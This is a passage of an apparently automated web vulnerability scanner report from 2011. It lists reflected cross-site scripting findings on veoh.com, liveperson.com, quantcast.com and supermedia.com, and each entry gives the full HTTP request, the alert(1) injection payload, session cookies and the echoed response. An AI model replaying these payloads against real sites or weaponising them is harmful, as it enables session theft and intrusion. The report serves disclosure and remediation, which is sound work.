This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/-MENUVALUE-ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:49:08 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 59484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"-MENUVALUE-ce5ce<img src=a onerror=alert(1)>c10905c976b","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea>
...[SNIP]...

1.470. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e was submitted in the REST URL parameter 4. This input was echoed as cc326"><img src=a onerror=alert(1)>67cf1c4032e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/-MENUVALUE-cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:48:43 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 59675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/search/videos/q/-MENUVALUE-cc326"><img src=a onerror=alert(1)>67cf1c4032e" selected="selected">
...[SNIP]...

1.471. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 was submitted in the REST URL parameter 4. This input was echoed as 14861"><img src=a onerror=alert(1)>93bdcf942a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/publisher:bunny1234414861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:48:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 60152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/search/videos/q/publisher:bunny1234414861"><img src=a onerror=alert(1)>93bdcf942a3" selected="selected">
...[SNIP]...

1.472. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 was submitted in the REST URL parameter 4. This input was echoed as e34d7<img src=a onerror=alert(1)>3d0b8bddcb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/publisher:bunny12344e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:49:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=62
Content-Length: 59961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"publisher:bunny12344e34d7<img src=a onerror=alert(1)>3d0b8bddcb4","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea>
...[SNIP]...

1.473. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/flag/permalinkId/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a041"style%3d"x%3aexpression(alert(1))"ad20725130b was submitted in the REST URL parameter 4. This input was echoed as 1a041"style="x:expression(alert(1))"ad20725130b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /video/flag/permalinkId/v18978294NGnK88j81a041"style%3d"x%3aexpression(alert(1))"ad20725130b HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=88
Content-Length: 32282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<form id="flagVideoForm" method="post" action="/video/submitflag/permalinkId/v18978294NGnK88j81a041"style="x:expression(alert(1))"ad20725130b" name="flagVideoForm" onsubmit="return verifyFlag(this);">
...[SNIP]...

1.474. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/share/permalinkId/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 was submitted in the REST URL parameter 4. This input was echoed as 42a1c"style="x:expression(alert(1))"80e77e495a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /video/share/permalinkId/v18978294NGnK88j842a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 30205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="text" onclick="this.select();" value="http://www.veoh.com/browse/videos/category//watch/v18978294NGnK88j842a1c"style="x:expression(alert(1))"80e77e495a9" readonly="true" />
...[SNIP]...

1.475. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d839'-alert(1)-'88ff7fe44ab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8d839'-alert(1)-'88ff7fe44ab

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 17:52:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D8d839%27%2Dalert%281%29%2D%2788ff7fe44ab; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=IKKOGOICDOJPFCIEFKNGGLFL; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=8d839'-alert(1)-'88ff7fe44ab');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

1.476. http://www.quantcast.com/p-aasG6JkxVvmNA [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff882"><script>alert(1)</script>9cbb95e5ed5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /p-aasG6JkxVvmNA HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ff882"><script>alert(1)</script>9cbb95e5ed5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 03 Feb 2011 22:03:05 GMT
Expires: Wed, 02 Feb 2011 10:03:06 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=0|82|1296770586032|0|NOTSET; Expires=Sat, 26-Jan-2041 22:03:06 GMT; Path=/
Set-Cookie: JSESSIONID=44D9028629FFF99EE86CE90A605E6EC0; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<a id="homeFootContactUs" href="http://www.bing.com/search?q=ff882"><script>alert(1)</script>9cbb95e5ed5+-quantcast" rel="nofollow">
...[SNIP]...

1.477. http://www.supermedia.com/community/blog [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /community/blog

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48f6c"-alert(1)-"c33954f4f7b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/blog HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Referer: http://www.google.com/search?hl=en&q=48f6c"-alert(1)-"c33954f4f7b

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:36 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=48f6c"-alert(1)-"c33954f4f7b";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.478. http://www.supermedia.com/crossdomain.xml [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /crossdomain.xml

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a79f"-alert(1)-"94d6ddab3a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3a79f"-alert(1)-"94d6ddab3a8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:46:53 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=3a79f"-alert(1)-"94d6ddab3a8";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.479. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52554"-alert(1)-"ef1396cf41e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=52554"-alert(1)-"ef1396cf41e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762103|check#true#1296760303; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=52554"-alert(1)-"ef1396cf41e";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.480. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8c66"-alert(1)-"92f4c806eeb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: d8c66"-alert(1)-"92f4c806eeb
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; mbox=session#1296759528614-838261#1296762103|check#true#1296760303

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:45 GMT
Content-Type: text/html;charset=UTF-8
